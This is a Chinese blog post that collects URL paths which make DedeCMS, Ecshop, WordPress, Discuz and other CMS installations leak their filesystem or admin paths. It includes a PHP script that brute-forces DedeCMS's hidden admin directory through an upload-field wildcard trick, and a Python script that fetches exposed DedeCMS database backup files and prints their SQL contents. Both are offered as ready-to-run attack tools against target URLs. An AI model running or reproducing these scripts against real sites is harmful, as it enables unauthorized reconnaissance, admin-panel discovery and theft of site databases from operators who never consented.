收集爆出cms后台路径的方法

已于 2024-04-15 09:05:38 修改
阅读量4.8k 收藏 4
点赞数
分类专栏: web 文章标签: 安全
于 2018-12-10 23:38:50 首次发布
钞sir
本文链接:https://blog.csdn.net/qq_40827990/article/details/84948369
版权

欢迎留言,添加更多!

DeDeCms:

/member/templets/menulit.php
/include/dialog/select_media.php
/plus/paycenter/alipay/return_url.php
/plus/paycenter/cbpayment/autoreceive.php
/paycenter/nps/config_pay_nps.php
/plus/task/dede-maketimehtml.php
/plus/task/dede-optimize-table.php
/plus/task/dede-upcache.php
<?php
$domain='http://test.com/';
$url=$domain.'/index.php';
function post($url, $data, $cookie = 'test') {
    $options = array(
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_HEADER => true,
        CURLOPT_POST => true,
        CURLOPT_SSL_VERIFYHOST => false,
        CURLOPT_SSL_VERIFYHOST => false,
        CURLOPT_COOKIE => $cookie,
        CURLOPT_POSTFIELDS => $data,
    );
    $ch = curl_init($url);
    curl_setopt_array($ch, $options);
    $result = curl_exec($ch);
    curl_close($ch);
    return $result;
}
$testlen=25;
$str=range('a','z');
$number=range(0,9,1);
$dic = array_merge($str, $number);
$n=true;
$nn=true;
$path='';
while($n){
    foreach($dic as $v){
        foreach($dic as $vv){
            #echo $v.$vv .'----';
            $post_data="dopost=save&_FILES[b4dboy][tmp_name]=./$v$vv</images/admin_top_logo.gif&_FILES[b4dboy][name]=0&_FILES[b4dboy][size]=0&_FILES[b4dboy][type]=image/gif";
            $result=post($url,$post_data);
            if(strpos($result,'Upload filetype not allow !') === false){
                $path=$v.$vv;$n=false;break 2;
            }
        }
    }
}
while($nn){
    foreach($dic as $vvv){
        $post_data="dopost=save&_FILES[b4dboy][tmp_name]=./$path$vvv</images/admin_top_logo.gif&_FILES[b4dboy][name]=0&_FILES[b4dboy][size]=0&_FILES[b4dboy][type]=image/gif";
        $result=post($url,$post_data);
        if(strpos($result,'Upload filetype not allow !') === false){
            $path.=$vvv;
            echo $path . PHP_EOL;
            $giturl=$domain.'/'.$path.'/images/admin_top_logo.gif';
            if(@file_get_contents($giturl)){
                echo $domain.'/'.$path.'/';
                $nn=false;break 2;
            }
        }
    }
}
?>
import requests
import sys
import gevent
from gevent import monkey
monkey.patch_all()
headers = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36"}

url = sys.argv[1]
# url = 'http://demo.dede.com/'

def gev():
    threads = [gevent.spawn(attack, num) for num in range(10)]
    gevent.joinall(threads)

def attack(num):
    try:
        exp = '/data/backupdata/dede_a~{}.txt'.format(num)
        url_exp = url + exp
        res = requests.get(url=url_exp, headers=headers)
        code = res.status_code
        text = res.text
        if code == 200 and 'INSERT INTO' in text:
            print('[{}] -> {}'.format(url_exp, text))
    except Exception as e:
        pass

gev()
# python3 dede.py HTTP://test.com/

WordPress:

/wp-admin/includes/file.php
/wp-content/themes/baiaogu-seo/footer.php

Ecshop商城系统暴路径漏洞文件:

/api/cron.php
/wap/goods.php
/temp/compiled/ur_here.lbi.php
/temp/compiled/pages.lbi.php
/temp/compiled/user_transaction.dwt.php
/temp/compiled/history.lbi.php
/temp/compiled/page_footer.lbi.php
/temp/compiled/goods.dwt.php
/temp/compiled/user_clips.dwt.php
/temp/compiled/goods_article.lbi.php
/temp/compiled/comments_list.lbi.php
/temp/compiled/recommend_promotion.lbi.php
/temp/compiled/search.dwt.php
/temp/compiled/category_tree.lbi.php
/temp/compiled/user_passport.dwt.php
/temp/compiled/promotion_info.lbi.php
/temp/compiled/user_menu.lbi.php
/temp/compiled/message.dwt.php
/temp/compiled/admin/pagefooter.htm.php
/temp/compiled/admin/page.htm.php
/temp/compiled/admin/start.htm.php
/temp/compiled/admin/goods_search.htm.php
/temp/compiled/admin/index.htm.php
/temp/compiled/admin/order_list.htm.php
/temp/compiled/admin/menu.htm.php
/temp/compiled/admin/login.htm.php
/temp/compiled/admin/message.htm.php
/temp/compiled/admin/goods_list.htm.php
/temp/compiled/admin/pageheader.htm.php
/temp/compiled/admin/top.htm.php
/temp/compiled/top10.lbi.php
/temp/compiled/member_info.lbi.php
/temp/compiled/bought_goods.lbi.php
/temp/compiled/goods_related.lbi.php
/temp/compiled/page_header.lbi.php
/temp/compiled/goods_script.html.php
/temp/compiled/index.dwt.php
/temp/compiled/goods_fittings.lbi.php
/temp/compiled/myship.dwt.php
/temp/compiled/brands.lbi.php
/temp/compiled/help.lbi.php
/temp/compiled/goods_gallery.lbi.php
/temp/compiled/comments.lbi.php
/temp/compiled/myship.lbi.php
/includes/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php
/includes/modules/cron/auto_manage.php
/includes/modules/cron/ipdel.php

Ucenter爆路径:

/ucenter/control/admin/db.php

DZbbs:

/manyou/admincp.php?my_suffix=%0A%0DTOBY57

Z-blog:

/admin/FCKeditor/editor/dialog/fck%5Fspellerpages/spellerpages/server%2Dscripts/spellchecker.php

Php168爆路径:

/admin/inc/hack/count.php?job=list
/admin/inc/hack/search.php?job=getcode
/admin/inc/ajax/bencandy.php?job=do
/cache/MysqlTime.txt
/PHPcms2008-sp4

CMSeasy爆网站路径漏洞:

/lib/mods/celive/menu_top.php
/lib/default/ballot_act.php
/lib/default/special_act.php

钞sir
关注
专栏目录
物理路径探测
聚鼎安全
12-11 2087
目录物理路径报错后台功能点搜索引擎容器特性文件泄露瞎蒙大法 物理路径 报错 【报错获得】 在处理报错信息的问题上如果处理不当,就可导致路径信息泄露,比如访问一些不存在的文件等思路。 这里的报错方法就很多了,说不完的,具体还要根据实际情况操作。下面说几种实用的↓ 1.有动态URL的地方可以替换参数 替换参数值为不存在的,很多时候都能物理路径 2.访问不存在的文件名 文件 或者改正常后缀为不支持的后缀。 IIS7.0以上,如果没有修改404页面,只要浏览web任意不存在的文件,都会直接暴出绝对路径。同理,
谈谈对后台登陆页面的渗透测试
09-10 2244
前言 有些朋友在渗透时扫描到后台登陆界面,却不知道如何入手。最近刚好在某公司做安全顾问,对目标固定的系统渗透有些体会。因此这里讲一下对网站后台登陆界面的渗透思路,希望能为大家提供一些帮助。 开始 本人在进入登陆界面时,一般都是先用万能密码什么的测下输入框有没有注入(现在很少见了)。如果没有,那就先拿admin,123456什么的测试下弱口令,不求运气棚一下就猜到密码。主要是...
aspcms逻辑错误导致后台地址泄露
weixin_30835933的博客
11-22 2068
访问即可跳转后台地址: URL:http://www.xxx.org.cn/plug/oem/AspCms_OEMFun.asp 注入:plug/comment/commentList.asp?id=0%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now%28%29,null,1%20%2...
aspcms后台地址
05-17
aspcms后台地址,秒杀老版本,修改后台地址一样能跳到真实地址
aspcms webshell漏洞复现
最新发布
2301_80402555的博客
09-17 150
1、在网址后输入/admin_aspcms/login.asp进入后台登陆界面 2、输入账号admin 密码123456 进行登录 3、点击【扩展功能】--》【幻灯片设置】--》点击 【保存】--》开启代理进行抓包 4、修改数据包中slideTextStatus的参数1%25><25Eval(Request(chr(65)))25><%25 5、访问/config/AspCms_Config.asp 6、使用菜刀进行连接 密码为a
aspcms绕过进入后台
04-11
aspcms绕过进入后台
dedecms织梦日志暴露后台地址漏洞BUG修复
09-07 573
然后修改/include/common.inc.php中DEDEDATA变量,将:define('DEDEDATA', DEDEROOT.'/data');修改tplcache缓存文件目录:登陆后台 > 系统 > 系统基本参数 > 性能选项,将模板缓存目录值改为 /../data/tplcache。首先用FTP或远程登陆的方式将data/mysql_error_trace.inc更名成 mysql_error_你喜欢的任意字符.inc。通过FTP将/data/文件夹移至web根目录的上一级目录;
123.网络安全渗透测试—[CMS后台 getwebshell]—[aspcms2.7后台 getwebshell]
qwsn
07-10 2282
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 进入后台---->内容维护---->文章新闻管理---->第一条新闻---->标题中加入以下内容:utf7一句话(密码为a) 扩展功能---->数据库备份恢复---->开始备份---->恢复此备份---->aspcms默认的数据库名为#5Dp8Gh.asp(但是在浏览器访问的时候要把#编码为%23,所以就是:)---->访问刚刚恢复的数据库:http://www.aspcms27.com/data/%235Dp8Gh.asp---
整理的网站后台目录+地址(4.5万条)
07-14
整理的网站后台目录+地址(4.5万条)。。。。。
利用CMS漏洞渗透并获取某服务器权限
热门推荐
wodafa的博客
03-14 1万+
在phpmyadmin漏洞与利用专题中,我们从多个角度介绍了如何获取webshell并获取服务器权限的案例和情形,但在实际渗透过程中还有一种情况,即服务器上存在phpMyAdmin,且获取了root帐号和密码,但无法执行load_file或者说无法导出webshell到服务器上,在这种情况下就需要充分利用既有CMS漏洞,通过CMS漏洞来获取webshell。目前使用流行架构,特别是一键式部署的系统
渗透流程--信息收集
m0_55563900的博客
03-27 2545
收集对象 :http://www.dotahacker.com/ 一、whois信息收集 1、站长之家whois查询:http://whois.chinaz.com/ 2、爱站网whois查询:https://whois.aizhan.com/ 3、万网whois查询:https://wanwang.aliyun.com/?utm_content=se_1006856273 4、网址:https://www.iana.org/whois 5、站点法人信息查询 (1)法人姓名查询和官方 企查查 查到
批量注入ASPCMS获得管理后台权限
08-25
批量注入ASPCMS获得管理后台权限,很好的东西
常见后台路径列表 路径
03-10
常见后台路径列表 后台 路径 常见 后台漏洞
aspcms后台管理系统
08-02
aspcms后台系统,个人感觉比较好用。希望喜欢的朋友下载
最新ASPCMS 0DAY利用工具(附VB源码)
03-25
详细使用方法在软件窗体内已经写好,直接编译执行即可使用.截止12-3-25日仍有效. 这是一个0day的EXP最好实例.
代码审计-审计方法和思路+文件对比技术
xiaoheizi的博客
08-06 403
查看cms官网更新情况,可以看到漏洞版本后又更新了一个版本,就可以下载漏洞版本和更新版本进行对比。在cnvd等漏洞信息共享平台经常会发布一些某某cms爆出了某某漏洞,但是就是不公开漏洞具体信息。只爆出了产生漏洞的版本信息,并没有漏洞具体产生位置。访问地址,传递参数为1。我们就可以使用存在漏洞的版本和更新的版本进行对比,因为更新的目的就是解决之前的问题。审计目标的程序名,版本,当前环境(系统,中间件,脚本语言等信息),各种插件等。审计项目漏洞原理->审计思路->完整源码->应用框架->验证并利用漏洞。
常见CMS后台
daqiangdetianxia的博客
10-10 653
常见CMS后台 先查询互联网,看到互联网上面有的话直接进行利用,如果没有的话然后自己搭建环境,进行测试。 cms后台 数据库备份拿shell 双文件上传 配置插马 修改文件上传类型 南方良精后台 sourthidceditor/admin.style.asp 科讯拿shell(建议IE浏览器) 一、 不利用解析漏洞 ​ 内容----->图片添加----> ​ (如果删除了图片添加按钮,可以去源代码中查找,在其他的按钮中替换开来) ​ 修改文件么默认上传类型为asasp
ASPCMS
m0_63944205的博客
08-03 260
ASPCMS是由上⾕⽹络开发的全新内核的开源企业建站系统,能够胜任企业多种建站需求,并且 ⽀持模版⾃定义、⽀持扩展插件等等,能够在短时间内完成 企业建站。
vue 用echart时 爆出警告 there is a chart instance already initialized on the dom
05-26
解决方法有以下几种: 1. 在每次重新渲染图表之前,先销毁之前的实例。可以在组件的 `beforeDestroy` 生命周期函数中调用 `echarts.dispose()` 来销毁实例。 2. 给每个图表实例设置一个唯一的 `id`,确保每个实例都...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值